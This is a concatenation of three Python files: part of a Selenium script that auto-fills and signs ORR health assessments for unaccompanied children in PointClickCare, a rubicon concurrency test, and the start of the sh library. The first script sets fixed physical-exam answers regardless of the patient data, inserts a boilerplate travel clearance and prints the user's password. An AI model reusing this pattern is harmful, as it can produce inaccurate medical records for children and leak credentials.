sendRequest(targent_name, "Error: Unable to set A.2.a", True)
# A.2.b.
res = send_click_pos(driver, "linkCust_A_2", 1)
if res:
sendRequest(targent_name, "Error: Unable to set A.2.b", True)
# A.2.c.
res = send_click_pos(driver, "linkCust_A_2", 2)
if res:
sendRequest(targent_name, "Error: Unable to set A.2.c", True)
# A.3.a.
res = send_click_pos(driver, "linkCust_A_3", 0)
if res:
sendRequest(targent_name, "Error: Unable to set A.3.a", True)
res = send_click_pos(driver, "linkCust_A_3", 1)
if res:
sendRequest(targent_name, "Error: Unable to set A.3.b", True)
# A.4.a.
res = send_click_pos(driver, "linkCust_A_4", 0)
if res:
sendRequest(targent_name, "Error: Unable to set A.4.a", True)
# A.5.a.
res = send_click_pos(driver, "linkCust_A_5", 0)
if res:
sendRequest(targent_name, "Error: Unable to set A.5.a", True)
# A.6.a.
res = send_click_pos(driver, "linkCust_A_6", 0)
if res:
sendRequest(targent_name, "Error: Unable to set A.6.a", True)
# A.7.a.
res = send_click_pos(driver, "linkCust_A_7", 0)
if res:
sendRequest(targent_name, "Error: Unable to set A.7.a", True)
res = send_click_pos(driver, "linkCust_A_7", 1)
if res:
sendRequest(targent_name, "Error: Unable to set A.7.b", True)
# A.8.a.
res = send_click_pos(driver, "linkCust_A_8", 0)
if res:
sendRequest(targent_name, "Error: Unable to set A.8.a", True)
res = send_click_pos(driver, "linkCust_A_8", 1)
if res:
sendRequest(targent_name, "Error: Unable to set A.8.b", True)
# A.9.a.
res = send_click_pos(driver, "linkCust_A_9", 0)
if res:
sendRequest(targent_name, "Error: Unable to set A.9.a", True)
# A.10.a.
res = send_click_pos(driver, "linkCust_A_10", 0)
if res:
sendRequest(targent_name, "Error: Unable to set A.10.a", True)
# A.11.a.
res = send_click_pos(driver, "linkCust_A_11", 0)
if res:
sendRequest(targent_name, "Error: Unable to set A.11.a", True)
# A.12.a.
res = send_click_pos(driver, "linkCust_A_12", 0)
if res:
sendRequest(targent_name, "Error: Unable to set A.12.a", True)
# A.13.a.
res = send_click_pos(driver, "linkCust_A_13", 0)
if res:
sendRequest(targent_name, "Error: Unable to set A.13.a", True)
# A.14.a.
res = send_click_pos(driver, "linkCust_A_14", 0)
if res:
sendRequest(targent_name, "Error: Unable to set A.14.a", True)
res = send_click_pos(driver, "linkCust_A_14", 1)
if res:
sendRequest(targent_name, "Error: Unable to set A.14.b", True)
# A.15.a.
res = send_click_pos(driver, "linkCust_A_15", 0)
if res:
sendRequest(targent_name, "Error: Unable to set A.15.a", True)
# Click Save & Sign & Lock & Exit
# send_click_pos(driver, "saveandexitbutton", 1)
# t.sleep(5)
res = send_click_pos(driver, "saveandsignbutton", 3)
if res:
sendRequest(targent_name, "Error: Unable to set A.15.a", True)
t.sleep(5)
res = select_window(driver, -1)
if res:
sendRequest(targent_name, "Error: Unable to set A.15.a", True)
t.sleep(1)
select_window(driver, -1)
t.sleep(1)
res = send_text_name(driver, "pw", password)
if res:
sendRequest(targent_name, "Error: Unable to set password", True)
send_click(driver, "saveButton")
print("Standing Orders Form Completed")
t.sleep(3)
select_window(driver, 0)
t.sleep(1)
res = select_window(driver, 0)
if res:
sendRequest(targent_name, "Error: Unable to switch window", True)
if clean_text(getData(data,'Assessment')).lower() == 'yes':
select_window(driver, 0)
t.sleep(1)
res = select_window(driver, 0)
if res:
sendRequest(targent_name, "Error: Unable to switch window", True)
print("*Health Assessment Form Unaccompanied Children's Program Office of Refugee Resettlement (ORR) - V 2")
# Click on "Assmnts"
try:
assessment=driver.find_element_by_xpath('/html/body/table[6]/tbody/tr[2]/td/ul/li[9]/a')
ActionChains(driver).move_to_element(assessment).click(assessment).perform()
except:
sendRequest(targent_name, "Error: Unable to click on Assmnts", True)
t.sleep(10)
# Stop If Stop Button is pressed
if thread_stopped == True:
break
try:
# Click on "New" button
newwww= driver.find_element_by_xpath('/html/body/form/table/tbody/tr[1]/td/table/tbody/tr/td[1]/input')
ActionChains(driver).move_to_element(newwww).click(newwww).perform()
except:
sendRequest(targent_name, "Error: Unable to click on New", True)
# Stop If Stop Button is pressed
if thread_stopped == True:
break
t.sleep(5)
# Select pop-up window "Reasons for Assessment"
# Click on "save" button - value="Save"
select_window(driver, -1)
t.sleep(1)
res = select_window(driver, -1)
if res:
sendRequest(targent_name, "Error: Unable to switch window", True)
try:
saveeee=driver.find_element_by_xpath('/html/body/form/div[2]/input[1]')
ActionChains(driver).move_to_element(saveeee).click(saveeee).perform()
except:
sendRequest(targent_name, "Error: Unable to click on save", True)
# Stop If Stop Button is pressed
if thread_stopped == True:
break
t.sleep(5)
# Return to main window
select_window(driver, 0)
t.sleep(1)
res = select_window(driver, 0)
if res:
sendRequest(targent_name, "Error: Unable to switch window", True)
t.sleep(1)
# A.General Information - a.Name and Designation
res = send_text(driver, 'linkCust_A_1_1', name_designation)
if res:
sendRequest(targent_name, "Error: Unable to set A.1.1", True)
# Stop If Stop Button is pressed
if thread_stopped == True:
break
res = send_text(driver, 'linkCust_A_1_2', str(getData(data,'telephone')))
if res:
sendRequest(targent_name, "Error: Unable to set A.1.2", True)
# Stop If Stop Button is pressed
if thread_stopped == True:
break
res = send_text(driver, 'linkCust_A_2', md_do_pa_np)
if res:
sendRequest(targent_name, "Error: Unable to set A.2", True)
res = send_text(driver, 'linkCust_A_3', getData(data,'clinicname') or clinic_or_practice)
if res:
sendRequest(targent_name, "Error: Unable to set A.3", True)
res = send_text(driver, 'linkCust_A_4', getData(data,'Healthcare Provider Street address, City or Town, State'))
if res:
sendRequest(targent_name, "Error: Unable to set A.4", True)
# send_text(driver, 'linkCust_A_5_dummy', data['Date of visit'])
res = send_text(driver, "linkCust_A_5_dummy", get_string_date(getData(data,'Date of visit')))
if res:
sendRequest(targent_name, "Error: Unable to set A.5", True)
# send_text(driver, 'linkCust_A_7', data['Program Name'])
# send_text(driver, 'Cust_B_1', temp_c)
# send_text(driver, 'linkCust_B_1a', hr)
# send_text(driver, 'linkCust_B_1b', bp)
# send_text(driver, 'linkCust_B_1c', rr)
# send_text(driver, 'linkCust_B_1d', ht)
# send_text(driver, 'linkCust_B_1e', wt)
#B.1a. Clear Data
# try:
# driver.find_element(By.XPATH, '//a[@href="javascript:clearPPControl(\'linkCust_B_1a\');"]').click();
# except:
# sendRequest(targent_name, "Error: Unable to click on B.1a", True)
# pass
# #B.1b. Clear Data
# try:
# driver.find_element(By.XPATH, '//a[@href="javascript:clearPPControl(\'linkCust_B_1b\');"]').click();
# except:
# sendRequest(targent_name, "Error: Unable to click on B.1b", True)
# pass
# #B.1c. Clear Data
# try:
# driver.find_element(By.XPATH, '//a[@href="javascript:clearPPControl(\'linkCust_B_1c\');"]').click();
# except:
# sendRequest(targent_name, "Error: Unable to click on B.1c", True)
# pass
# #B.1d. Clear Data
# try:
# driver.find_element(By.XPATH, '//a[@href="javascript:clearPPControl(\'linkCust_B_1d\');"]').click();
# except:
# sendRequest(targent_name, "Error: Unable to click on B.1d", True)
# pass
# #B.1e. Clear Data
# try:
# driver.find_element(By.XPATH, '//a[@href="javascript:clearPPControl(\'linkCust_B_1e\');"]').click();
# except:
# sendRequest(targent_name, "Error: Unable to click on B.1e", True)
# pass
# #B.1f. Clear Data
# try:
# driver.find_element(By.XPATH, '//a[@href="javascript:clearPPControl(\'linkCust_B_1f\');"]').click();
# except:
# sendRequest(targent_name, "Error: Unable to click on B.1f", True)
# pass
# B. History and Physical - Allergies
if no_allergies == 'Yes':
res = send_click_pos(driver, 'linkCust_B_2', 0)
if res:
sendRequest(targent_name, "Error: Unable to click on B.2", True)
if food == 'Yes':
res = send_click_pos(driver, 'linkCust_D_2', 1)
if res:
sendRequest(targent_name, "Error: Unable to click on D.2", True)
if medication == 'Yes':
res = send_click_pos(driver, 'linkCust_D_2', 2)
if res:
sendRequest(targent_name, "Error: Unable to click on D.2", True)
# B: History and Physical - 3. Concerns expressed by child or caregiver?
# Click Yes
# linkCust_B_3
try:
b_3=driver.find_elements_by_id('linkCust_B_3')
ActionChains(driver).move_to_element( b_3[1]).click( b_3[1]).perform()
except:
sendRequest(targent_name, "Error: Unable to click on B.3", True)
pass
res = send_text(driver, 'linkCust_B_3a', corrected_left_eye)
if res:
sendRequest(targent_name, "Error: Unable to set B.3a", True)
# res = send_text(driver, 'linkCust_B_3b', corrected_both_eyes)
# if res:
# sendRequest(targent_name, "Error: Unable to set B.3b", True)
# res = send_text(driver, 'linkCust_B_4', uncorrected_right_eye)
# if res:
# sendRequest(targent_name, "Error: Unable to set B.4", True)
# res = send_text(driver, 'linkCust_B_4b', uncorrected_both_eyes)
# if res:
# sendRequest(targent_name, "Error: Unable to set B.4b", True)
# res = send_text(driver, 'linkCust_B_5', medical_history)
# if res:
# sendRequest(targent_name, "Error: Unable to set B.5", True)
# res = send_text(driver, 'linkCust_B_6', travel_history)
# if res:
# sendRequest(targent_name, "Error: Unable to set B.6", True)
# res = send_text(driver, 'linkCust_B_7', past_medical_history)
# if res:
# sendRequest(targent_name, "Error: Unable to set B.7", True)
# res = send_text(driver, 'linkCust_B_8', family_history)
# if res:
# sendRequest(targent_name, "Error: Unable to set B.8", True)
# res = send_text(driver, 'linkCust_B_9', str(lmp))
# if res:
# sendRequest(targent_name, "Error: Unable to set B.9", True)
# res = send_text(driver, 'linkCust_B_9a', str(previous_regnancy))
# if res:
# sendRequest(targent_name, "Error: Unable to set B.9a", True)
res = send_text(driver, 'linkCust_C_21', other_1)
if res:
sendRequest(targent_name, "Error: Unable to set C.21", True)
res = send_text(driver, 'linkCust_C_22', other_2)
if res:
sendRequest(targent_name, "Error: Unable to set C.22", True)
if no_abnormal_findings == 'Yes':
res = send_click(driver, 'linkCust_C_1')
if res:
sendRequest(targent_name, "Error: Unable to click on C.1", True)
# Physical Examination D
res = send_click_pos(driver, 'linkCust_D_1', 0)
if res:
sendRequest(targent_name, "Error: Unable to set D.1.a", True)
res = send_click_pos(driver, 'linkCust_D_2', 0)
if res:
sendRequest(targent_name, "Error: Unable to set D.2.a", True)
res = send_click_pos(driver, 'linkCust_D_3', 0)
if res:
sendRequest(targent_name, "Error: Unable to set D.3.a", True)
res = send_click_pos(driver, 'linkCust_D_4', 0)
if res:
sendRequest(targent_name, "Error: Unable to set D.4.a", True)
res = send_click_pos(driver, 'linkCust_D_5', 0)
if res:
sendRequest(targent_name, "Error: Unable to set D.5.a", True)
res = send_click_pos(driver, 'linkCust_D_6', 0)
if res:
sendRequest(targent_name, "Error: Unable to set D.6.a", True)
res = send_click_pos(driver, 'linkCust_D_8', 0)
if res:
sendRequest(targent_name, "Error: Unable to set D.8.a", True)
res = send_click_pos(driver, 'linkCust_D_9', 0)
if res:
sendRequest(targent_name, "Error: Unable to set D.9.a", True)
res = send_click_pos(driver, 'linkCust_D_10', 0)
if res:
sendRequest(targent_name, "Error: Unable to set D.10.a", True)
res = send_click_pos(driver, 'linkCust_D_11', 0)
if res:
sendRequest(targent_name, "Error: Unable to set D.11.a", True)
# if general_appearance.lower() == 'normal':
# send_click_pos(driver, 'linkCust_D_1', 0)
# else:
# send_click_pos(driver, 'linkCust_D_1', 1)
# if heent.lower() == 'normal':
# send_click_pos(driver, 'linkCust_D_2', 0)
# else:
# send_click_pos(driver, 'linkCust_D_2', 1)
# if neck.lower() == 'normal':
# send_click_pos(driver, 'linkCust_D_3', 0)
# else:
# send_click_pos(driver, 'linkCust_D_3', 1)
# if heart.lower() == 'normal':
# send_click_pos(driver, 'linkCust_D_4', 0)
# else:
# send_click_pos(driver, 'linkCust_D_4', 1)
# if lungs.lower() == 'normal':
# send_click_pos(driver, 'linkCust_D_5', 0)
# else:
# send_click_pos(driver, 'linkCust_D_5', 1)
# if abdomen.lower() == 'normal':
# send_click_pos(driver, 'linkCust_D_6', 0)
# else:
# send_click_pos(driver, 'linkCust_D_6', 1)
# try:
# d7a=driver.find_element_by_id('linkCust_D_7a')
# ActionChains(driver).move_to_element( d7a).click( d7a).send_keys(describe).perform()
# except:
# pass
# if extremeties.lower() == 'normal':
# send_click_pos(driver, 'linkCust_D_8', 0)
# else:
# send_click_pos(driver, 'linkCust_D_8', 1)
# if back_spine.lower() == 'normal':
# send_click_pos(driver, 'linkCust_D_9', 0)
# else:
# send_click_pos(driver, 'linkCust_D_9', 1)
# if neurologic.lower() == 'normal':
# send_click_pos(driver, 'linkCust_D_10', 0)
# else:
# send_click_pos(driver, 'linkCust_D_10', 1)
# if skin.lower() == 'normal':
# send_click_pos(driver, 'linkCust_D_11', 0)
# else:
# send_click_pos(driver, 'linkCust_D_11', 1)
# try:
# driver.find_element(By.ID, 'linkCust_D_12').clear()
# driver.find_element(By.ID, 'linkCust_D_12').send_keys("Whisper test passed")
# except:
# pass
# asdddddd= driver.find_element_by_xpath('/html/body/table[5]/tbody/tr[2]/td/table/tbody/tr[5]/td/form/table/tbody/tr[2]/td/table/tbody/tr[5]/td[3]/table/tbody/tr[3]/td/table/tbody/tr[4]/td[2]')
# try:
# buttonnn= asdddddd.find_elements_by_tag_name('input')
# ActionChains(driver).move_to_element(buttonnn[int(mental_health)]).click(buttonnn[int(mental_health)]).perform()
# except:
# sendRequest(targent_name, "Error: Unable to click mental_health", True)
# pass
# Stop If Stop Button is pressed
if thread_stopped == True:
break
# # Escondida checkbox
# res = send_click_pos(driver, 'linkCust_F_2', 0)
# if res:
# sendRequest(targent_name, "Error: Unable to click F.2", True)
# # Escondida checkbox
# t.sleep(1)
# res = send_click_pos(driver, 'linkCust_F_2b', 1)
# if res:
# sendRequest(targent_name, "Error: Unable to click F.2b", True)
# t.sleep(1)
# res = send_click_pos(driver, 'linkCust_G_1', 0)
# if res:
# sendRequest(targent_name, "Error: Unable to click G.1", True)
# t.sleep(1)
# res = send_click_pos(driver, 'linkCust_G_2', 0)
# if res:
# sendRequest(targent_name, "Error: Unable to click G.2", True)
# res = send_click_pos(driver, 'linkCust_G_3', 0)
# if res:
# sendRequest(targent_name, "Error: Unable to click G.3", True)
# res = send_click_pos(driver, 'linkCust_G_4', 1)
# if res:
# sendRequest(targent_name, "Error: Unable to click G.4", True)
# # No se encontro
# res = send_click_pos(driver, 'linkCust_H_1', 0)
# if res:
# sendRequest(targent_name, "Error: Unable to click H.1", True)
# #linkCust_H_13
# try:
# # No se encontro
# b1e=driver.find_elements_by_id('linkCust_H_13')
# ActionChains(driver).move_to_element(b1e[0]).click(b1e[0]).send_keys(other_medical).perform()
# except:
# sendRequest(targent_name, "Error: Unable to click other_medical", True)
# pass
# try:
# # t.sleep(5)
# # No se encontro
# b1e=driver.find_elements_by_id('linkCust_H_14')
# #ActionChains(driver).move_to_element(b1e[0]).click(b1e[0]).perform()
# except:
# sendRequest(targent_name, "Error: Unable to click linkCust_H_14", True)
# pass
# try:
# # t.sleep(5)
# # No se encontro
# b1e=driver.find_elements_by_id('linkCust_H_15')
# ActionChains(driver).move_to_element(b1e[0]).click(b1e[0]).perform()
# ActionChains(driver).move_to_element(b1e[5]).click(b1e[5]).perform()
# ActionChains(driver).move_to_element(b1e[7]).click(b1e[7]).perform()
# ActionChains(driver).move_to_element(b1e[10]).click(b1e[10]).perform()
# except:
# sendRequest(targent_name, "Error: Unable to click linkCust_H_15", True)
# pass
# try:
# # No se encontro
# b1e=driver.find_elements_by_id('linkCust_H_15e')
# ActionChains(driver).move_to_element(b1e[0]).click(b1e[0]).send_keys(h15).perform()
# except:
# sendRequest(targent_name, "Error: Unable to click linkCust_H_15e", True)
# pass
# AW: Describe concerns
# try:
# # Escondido
# e1a=driver.find_element_by_id('linkCust_E_1a')
# ActionChains(driver).move_to_element( e1a).click( e1a).send_keys(describe_concerns).perform()
# except:
# pass
try:
# No se encontro
h16=driver.find_element_by_id('linkCust_H_16')
ActionChains(driver).move_to_element( h16).click( h16).send_keys(getData(data,'Additional Information')).perform()
except:
# sendRequest(targent_name, "Error: Unable to click linkCust_H_16", True)
pass
# No se encontro
send_click_pos(driver, 'linkCust_I_1', 1)
# No se encontro
send_click_pos(driver, 'linkCust_I_2', 2)
# No se encontro
send_click_pos(driver, 'linkCust_I_3', 1)
# No se encontro
send_click_pos(driver, 'linkCust_I_4', 0)
# No se encontro
send_click_pos(driver, 'linkCust_J_1', 0)
# Stop If Stop Button is pressed
if thread_stopped == True:
break
# F. Diagnosis and Plan - Diagnosis
# ID: linkCust_F_1f
# Name: Cust_F_1
# Click in Yes
res = send_click_pos(driver, 'linkCust_F_1', 1)
if res:
sendRequest(targent_name, "Error: Unable to click F.1", True)
# F. Diagnosis and Plan - Plan - a. Return to clinic:
# linkCust_F_a
# Click in No
res = send_click_pos(driver, 'linkCust_F_a', 0)
if res:
sendRequest(targent_name, "Error: Unable to click F.a", True)
# F. Diagnosis and Plan - Plan - b. Minor fit to travel?
# linkCust_F_b
# Click on Yes
res = send_click_pos(driver, 'linkCust_F_b', 1)
if res:
sendRequest(targent_name, "Error: Unable to click F.b", True)
t.sleep(1)
# F. Diagnosis and Plan - Plan - b1. Specify travel:
try:
driver.find_element(By.ID, 'linkCust_F_b1').clear()
driver.find_element(By.ID, 'linkCust_F_b1').send_keys("The minor is medically cleared to travel if no known exposure to COVID has occurred and no other concerns requiring medical follow-up and/or specialty follow-up have been identified in subsequent visits.")
except:
sendRequest(targent_name, "Error: Unable to click F.b1", True)
pass
# F. Diagnosis and Plan - Plan - c.Per program staff, discharge from ORR custody will be delayed?
# linkCust_F_c
# Click in No
res = send_click_pos(driver, 'linkCust_F_c', 0)
if res:
sendRequest(targent_name, "Error: Unable to click F.c", True)
# F. Diagnosis and Plan - Plan - d.Minor has/May have an ADA disability?
# linkCust_F_d
# Click in No
res = send_click_pos(driver, 'linkCust_F_d', 0)
if res:
sendRequest(targent_name, "Error: Unable to click F.d", True)
# F. Diagnosis and Plan - Plan - i.Age- appropriate anticipatory guidance discussed and/or handout given
# linkCust_F_i
# Clickbox
# send_click_pos(driver, 'linkCust_F_i', 0)
status_string = "Click button Save & Sign"
print(status_string)
# Click button Save & Sign
try:
wwwwww= driver.find_element_by_xpath('/html/body/table[5]/tbody/tr[2]/td/table/tbody/tr[8]/td/input[3]')
ActionChains(driver).move_to_element(wwwwww).click(wwwwww).perform()
except:
sendRequest(targent_name, "Error: Unable to click Save & Sign", True)
pass
t.sleep(3)
## END - USER EDIT
break
# else:
# print("User not found")
# # Click on search input field
# search_select=driver.find_element_by_id('searchSelect')
# ActionChains(driver).move_to_element(search_select).click(search_select).perform()
# t.sleep(2)
# try:
# driver.find_element_by_xpath('//td[contains(text(),"All Facilities")]').click()
# except:
# pass
# # Click on search input field
# searchhhh_person=driver.find_element_by_id('searchField')
# # Send Excel name
# ActionChains(driver).move_to_element(searchhhh_person).click(searchhhh_person).send_keys(target_user_id, Keys.ENTER).perform()
# # Stop If Stop Button is pressed
# if thread_stopped == True:
# break
# # Select pop-up window "Global Resident Search -- All Residents"
# t.sleep(5)
# print(driver.window_handles)
# try:
# driver.switch_to.window(driver.window_handles[-1])
# print("Select pop-up windo - Global Resident Search")
# except:
# pass
# try:
# driver.switch_to_window(driver.window_handles[-1])
# print("Select pop-up windo - Global Resident Search2")
# except:
# pass
# try:
# driver.find_element_by_xpath('//a[contains(text(),"Current"]').click()
# print("Click Current tab")
# except:
# pass
# try:
# driver.find_element_by_xpath("//a[@href='/admin/client/clientlist.jsp?ESOLview=Current&ESOLglobalclientsearch=Y']").click();
# print("Click Current tab2")
# except:
# pass
# try:
# driver.find_element_by_link_text("Current").click()
# print("Click Current tab3")
# except:
# pass
t.sleep(1)
select_window(driver, 0)
print("END - USER EDIT")
## END - USER EDIT
break
else:
print("User not found")
# Click on search input field
try:
search_select=driver.find_element(By.ID, 'searchSelect')
ActionChains(driver).move_to_element(search_select).click(search_select).perform()
except:
pass
t.sleep(2)
try:
driver.find_element(By.XPATH, '//td[contains(text(),"All Facilities")]').click()
except:
pass
# Click on search input field
# Send Excel name
res = send_text(driver, 'searchField', target_user_id)
if res:
sendRequest(targent_name, "Error: Unable to click searchField", True)
res = send_enter(driver, 'searchField')
if res:
sendRequest(targent_name, "Error: Unable to click searchField", True)
# Stop If Stop Button is pressed
if thread_stopped == True:
break
# Select pop-up window "Global Resident Search -- All Residents"
t.sleep(5)
print(driver.window_handles)
try:
driver.switch_to.window(driver.window_handles[-1])
print("Select pop-up windo - Global Resident Search")
except:
pass
try:
driver.switch_to_window(driver.window_handles[-1])
print("Select pop-up windo - Global Resident Search2")
except:
pass
try:
driver.find_element(By.XPATH, '//a[contains(text(),"Current"]').click()
print("Click Current tab")
except:
pass
try:
driver.find_element(By.XPATH, "//a[@href='/admin/client/clientlist.jsp?ESOLview=Current&ESOLglobalclientsearch=Y']").click();
print("Click Current tab2")
except:
pass
try:
driver.find_element(By.LINK_TEXT, "Current").click()
print("Click Current tab3")
except:
pass
current_users=driver.find_element(By.CLASS_NAME, 'pccTableShowDivider').find_elements(By.TAG_NAME, 'tr')
except Exception as e:
print(e)
# sendRequest(targent_name, "Error: Unable to find user", True)
pass
else:
print("NOT FOUND - " + target_user_id + "-" + target_user_a + "-" + targent_name)
res = write_file_data(datetime.now().strftime("%Y-%m-%d %H:%M:%S") + "," + str(target_user_id) + "," + str(target_user_a) + "," + targent_name + "\n")
if res:
sendRequest(targent_name, "Error: Unable to write not found error log", True)
driver.close()
select_window(driver, 0)
t.sleep(1)
res = select_window(driver, 0)
if res:
sendRequest(targent_name, "Error: Could not switch to main window", True)
continue
#except:
except Exception as e:
print(e)
sendRequest(targent_name, "Error: Unable to select user", True)
pass
except Exception as e:
print(e)
with open(os.path.join(os.path.dirname(os.path.abspath(__file__)), "error.txt"), "a") as myfile:
myfile.write(datetime.now().strftime("%Y-%m-%d %H:%M:%S") + " - " + str(e) + "\n")
pass
print("PROCESS COMPLETED")
sendRequest("System", "Process Completed", False)
# Get
def get_covid_vaccine_by_name(imm_list):
return imm_list[len(imm_list)-1]
def stop_automation_thread():
global thread_stopped
if thread_stopped == True:
thread_stopped = False
else:
thread_stopped = True
def get_excel_gile():
global patient_data_sheet
# Open file explorer and select only xlsx file types
filename = fd.askopenfilename(
title='Open a file',
initialdir='/',
filetypes=[("Excel file","*.xlsx")])
patient_data_sheet = filename
class NewprojectApp:
def __init__(self, master=None):
global selected_sheet
df = pd.read_excel(os.path.join(os.path.dirname(os.path.abspath(__file__)), "data.xlsx"), sheet_name=None)
def start_automation_thread():
# Set global variable to false
global thread_stopped, user_name, password, selected_sheet
thread_stopped = False
# user_name = self.e1a.get()
password = self.e2a.get()
print('###############')
# print(user_name)
print(password)
print('###############')
# Create new thread target automation
thread_x = Thread(target=main_loop, args=[])
# Start Tread Activity
thread_x.start()
# build ui
self.toplevel1 = tk.Tk() if master is None else tk.Toplevel(master)
# Title Label
self.label1 = ttk.Label(self.toplevel1)
self.label1.configure(background='#ff5454', font='{@Microsoft YaHei} 12 {}',
text='PCC')
self.label1.pack(pady='10', side='top')
self.frame2 = tk.Frame(self.toplevel1)
# self.e1 = tk.Label(self.frame2)
# self.e1.configure(background='#ffffff', text="User Name")
# self.e1.pack()
# self.e1a = tk.Entry(self.frame2)
# self.e1a.pack()
self.e2 = tk.Label(self.frame2)
self.e2.configure(background='#ffffff', text="Password")
self.e2.pack()
self.e2a = tk.Entry(self.frame2)
self.e2a.pack()
# Open Chrome Button
self.button5 = tk.Button(self.frame2)
self.button5.configure( text='Open Chrome', command=open_chrome)
self.button5.pack(ipadx='20', ipady='0', pady='5', side='top')
# Sheets
options = list(df.keys());
clicked = tk.StringVar()
clicked.set(options[0])
selected_sheet = options[0];
self.drop = tk.OptionMenu( self.frame2 , clicked , *options, command=selectSheet )
self.drop.pack()
# Start Button
self.button6 = tk.Button(self.frame2)
self.button6.configure(text='Start', command=start_automation_thread)
self.button6.pack(ipadx='20', pady='5', side='top')
# Stop Button
self.button7 = tk.Button(self.frame2)
self.button7.configure(text='Stop', command=stop_automation_thread)
self.button7.pack(ipadx='20', pady='5', side='top')
# Version Footer
self.label2 = tk.Label(self.frame2)
self.label2.configure(background='#ffffff', text="Version 2.2")
self.label2.pack(side='top')
self.frame2.configure(background='#ffffff', height='200', width='200')
self.frame2.pack(side='top')
# Window title bar
self.toplevel1.configure(background='#ffffff', height='200', width='300')
self.toplevel1.minsize(300, 200)
self.toplevel1.overrideredirect('False')
self.toplevel1.resizable(False, False)
self.toplevel1.title('Pointclick Care Automator')
# Main widget
self.mainwindow = self.toplevel1
def run(self):
self.mainwindow.mainloop()
if __name__ == '__main__':
app = NewprojectApp()
app.run()
|
test_concurrency.py
|
import multiprocessing
import pandas as pd
from dask import dataframe as dd
from rubicon.domain.utils import uuid
def _log_all_to_experiment(experiment):
ddf = dd.from_pandas(pd.DataFrame([0, 1], columns=["a"]), npartitions=1)
for _ in range(0, 4):
experiment.log_metric(uuid.uuid4(), 0)
experiment.log_feature(uuid.uuid4())
experiment.log_parameter(uuid.uuid4(), 1)
experiment.log_artifact(data_bytes=b"artifact bytes", name=uuid.uuid4())
experiment.log_dataframe(ddf)
experiment.add_tags([uuid.uuid4()])
def _read_all_from_experiment(experiment):
for _ in range(0, 4):
experiment.metrics()
experiment.features()
experiment.parameters()
experiment.artifacts()
experiment.dataframes()
experiment.tags
def test_filesystem_concurrency(rubicon_local_filesystem_client):
rubicon = rubicon_local_filesystem_client
project = rubicon.create_project("Test Concurrency")
experiment = project.log_experiment()
processes = []
for i in range(0, 4):
process = multiprocessing.Process(target=_read_all_from_experiment, args=[experiment])
process.start()
processes.append(process)
for i in range(0, 4):
process = multiprocessing.Process(target=_log_all_to_experiment, args=[experiment])
process.start()
processes.append(process)
for process in processes:
process.join()
assert len(experiment.metrics()) == 16
assert len(experiment.features()) == 16
assert len(experiment.parameters()) == 16
assert len(experiment.artifacts()) == 16
assert len(experiment.dataframes()) == 16
assert len(experiment.tags) == 16
|
sh.py
|
"""
http://amoffat.github.io/sh/
"""
# ===============================================================================
# Copyright (C) 2011-2020 by Andrew Moffat
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
# ===============================================================================
__version__ = "1.14.1"
__project_url__ = "https://github.com/amoffat/sh"
from collections import deque
try:
from collections.abc import Mapping
except ImportError:
from collections import Mapping
from contextlib import contextmanager
from functools import partial
from io import UnsupportedOperation, open as fdopen
from locale import getpreferredencoding
from types import ModuleType, GeneratorType
import ast
import errno
import fcntl
import gc
import getpass
import glob as glob_module
import inspect
import logging
import os
import platform
import pty
import pwd
import re
import select
import signal
import stat
import struct
import sys
import termios
import threading
import time
import traceback
import tty
import warnings
import weakref
IS_PY3 = sys.version_info[0] == 3
MINOR_VER = sys.version_info[1]
IS_PY26 = sys.version_info[0] == 2 and MINOR_VER == 6
if IS_PY3:
from io import StringIO
ioStringIO = StringIO
from io import BytesIO as cStringIO
iocStringIO = cStringIO
from queue import Queue, Empty
# for some reason, python 3.1 removed the builtin "callable", wtf
if not hasattr(__builtins__, "callable"):
def callable(ob):
return hasattr(ob, "__call__")
else:
from StringIO import StringIO
from cStringIO import OutputType as cStringIO
from io import StringIO as ioStringIO
from io import BytesIO as iocStringIO
from Queue import Queue, Empty
try:
from shlex import quote as shlex_quote # here from 3.3 onward
except ImportError:
from pipes import quote as shlex_quote # undocumented before 2.7
if "windows" in platform.system().lower(): # pragma: no cover
raise ImportError("sh %s is currently only supported on linux and osx. \
please install pbs 0.110 (http://pypi.python.org/pypi/pbs) for windows \
support." % __version__)
DEFAULT_ENCODING = getpreferredencoding() or "UTF-8"
IS_MACOS = platform.system() in ("AIX", "Darwin")
THIS_DIR = os.path.dirname(os.path.realpath(__file__))
SH_LOGGER_NAME = __name__
# normally i would hate this idea of using a global to signify whether we are
# running tests, because it breaks the assumption that what is running in the
# tests is what will run live, but we ONLY use this in a place that has no
# serious side-effects that could change anything. as long as we do that, it
# should be ok
RUNNING_TESTS = bool(int(os.environ.get("SH_TESTS_RUNNING", "0")))
FORCE_USE_SELECT = bool(int(os.environ.get("SH_TESTS_USE_SELECT", "0")))
# a re-entrant lock for pushd. this way, multiple threads that happen to use
# pushd will all see the current working directory for the duration of the
# with-context
PUSHD_LOCK = threading.RLock()
if hasattr(inspect, "getfullargspec"):
def get_num_args(fn):
return len(inspect.getfullargspec(fn).args)
else:
def get_num_args(fn):
return len(inspect.getargspec(fn).args)
if IS_PY3:
raw_input = input
unicode = str
basestring = str
long = int
_unicode_methods = set(dir(unicode()))
HAS_POLL = hasattr(select, "poll")
POLLER_EVENT_READ = 1
POLLER_EVENT_WRITE = 2
POLLER_EVENT_HUP = 4
POLLER_EVENT_ERROR = 8
# here we use an use a poller interface that transparently selects the most
# capable poller (out of either select.select or select.poll). this was added
# by zhangyafeikimi when he discovered that if the fds created internally by sh
# numbered > 1024, select.select failed (a limitation of select.select). this
# can happen if your script opens a lot of files
if HAS_POLL and not FORCE_USE_SELECT:
class Poller(object):
def __init__(self):
